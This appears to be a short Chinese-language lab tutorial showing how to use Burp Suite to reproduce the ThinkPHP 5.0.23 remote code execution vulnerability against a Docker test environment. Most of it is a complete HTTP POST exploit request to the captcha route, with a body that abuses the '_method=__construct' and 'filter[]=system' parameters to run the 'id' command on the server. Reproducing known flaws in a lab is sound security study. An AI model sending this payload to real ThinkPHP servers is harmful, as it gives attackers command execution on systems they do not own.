BurpSuite实例

ThinkPHP-5.0.23-rce漏洞

启动服务器

• 克隆项目

#启动默认 thinkphp 5.0.23 环境
docker compose up -d

抓包

• 浏览器启动代理，并访问服务器

• 找到要抓的包，并将其转到 Repeater。

• 将 GET 请求转换为 POST 请求

• 修改 POST 请求，复现漏洞

  POST /index.php?s=captcha HTTP/1.1
  Host: 192.168.85.99:8080
  Pragma: no-cache
  Cache-Control: no-cache
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate, br
  Accept-Language: zh-CN,zh;q=0.9
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 72
  
  _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id